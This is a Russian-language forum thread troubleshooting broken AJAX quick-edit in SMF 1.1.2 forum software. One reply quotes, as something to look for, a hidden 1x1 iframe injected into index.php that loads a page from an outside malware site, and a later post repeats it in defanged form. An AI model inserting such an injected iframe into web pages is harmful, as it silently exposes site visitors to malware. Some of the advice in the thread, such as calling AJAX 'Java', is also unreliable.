Advertisement:

Author Topic: Проблема с Ajax быстрым редактированием  (Read 6224 times)

Offline SchizoInside

  • Newbie
  • *
  • Posts: 5
Столкнулся с мистической проблемой.

Немного о исходных данных.
Форум: SMF 1.1.2

Установленны след. моды:
Merge Double Posts
Karma Description Mod
Member Awards-RussianEdition
Sticky First Post (extends sticky topic)
1 nick click    1.0
DoublePostMerge-Rusification

Проблема: при нажатии на иконку в сообщении быстро отредактировать (та котоая не перегружая страницы позволяет отредактировать сообщение и тему) появляется форма, все замечательно, но при нажатии на кнопку Сохранить ничего не происходит кроме появления сверху на зеленом фонее сообщения о загрузке).

В Firefox 2.0.0.3 никаких ошибок не вылезает, все нормально. В IE6 появляется ошибка "Строка: 129 Символ: 2 Ошибка: "getElementsByTagName(...).0" - есть null или не является объектом Код: 0".

Тема стоит pdx-dk-09i. При смене темы в профайле пользователя и попытке отредактировать сообщение этим способом все работает. Пробовал заменять все файлы в папках темы pdx-dk-09i и default на родные (начальные, взятые из архивов дистрибутива) ничего не изменяется, проблема остается.

Попытки вернутся на момент до установки модов (используя архивы в папке forum/Packages/backups) ничего не изменили. Уже и не знаю что думать.

Просьба помочь хоть чем-то... может кто знает как решить, или же просто где искать проблему. Точно сказать что было от момента когда работало редактирование и перестало не могу, так как сложно установить когда последний раз работало.

Offline SchizoInside

  • Newbie
  • *
  • Posts: 5
Немного продвинулся в проблеме.

Сегодня обновил все файлы форума до родных (то есть без установленных модулей), такой, каким он должен был быть будто только что установлен. Оставил только старую базу данных. Предварительно удалил все модули через админку. Результат - никакого. Редактирование на AJAX так и не заработало.

Когда разобрался в чем проблема стал разбирваться с БД, но ни оптимизация, ни починка phpmyadmin-а, ни тоже самое через админку в форуме не помогло.

Бекапов раних БД нету. Круг поисков сузился, но от этого не очень легче :(

Offline AlexN

  • Newbie
  • *
  • Posts: 7
У меня было то же самое. голову сломал.
Оказалось, что в основной index.php в самый конец была дописана строка iframe со ссылкой на сайт с вирусом.
После удаления этой записи все заработало как и прежде.

Поищи нечто похожее. Все может быть.
Code: [Select]
<iframe width=1 height=1 border=0 frameborder=0 src='http://trustdotcom.com/nnews/index.php' style='display:none;'></iframe>

Offline SchizoInside

  • Newbie
  • *
  • Posts: 5
<iframe width=1 height=1 border=0 frameborder=0 src='hxxp:trustdotcom.com/nnews/index.php [nonactive]' style='display:none;'></iframe>
Фреймов не нашел, но спасибо.
Еще пошукаю. Но если есть еще идеи - буду очень признателен!

Offline Genius2007

  • Newbie
  • *
  • Posts: 1
У меня точно такая же проблема... Фреймы есть, но они от хостинга бесплатного... Раньше работало, теперь не хочет. Но у меня немного подругому. У меня при нажатии кнопки быстрого редактирования появляется зелёная полоска загрузки и всё... Это в Опере. В IE просто выдаёт ошибку в коде точно такую же как в первом посте. Базу данных востанавливал старую, ничего не изменилось. Моды не ставил...  Помогите!

Offline NeLLIsania

  • Semi-Newbie
  • *
  • Posts: 89
  • Аэтошозадеталь ?
можно попробовать почистить кеш браузера, т.к. ajax на Java, а он кешируется и даже если заменить на новые файлы, не всегда помогает.
/* Have a nice day! */

Offline SchizoInside

  • Newbie
  • *
  • Posts: 5
можно попробовать почистить кеш браузера, т.к. ajax на Java, а он кешируется и даже если заменить на новые файлы, не всегда помогает.
Непомогло...

Offline NeLLIsania

  • Semi-Newbie
  • *
  • Posts: 89
  • Аэтошозадеталь ?
сделай проще. удали все файло (source, themes и т.д.) сделай бекап бд. потом поставь чистый форум. проверь работает ли ajax. Eсли работает восстанавливай бд. Если не работает, значит беда с сервером.
/* Have a nice day! */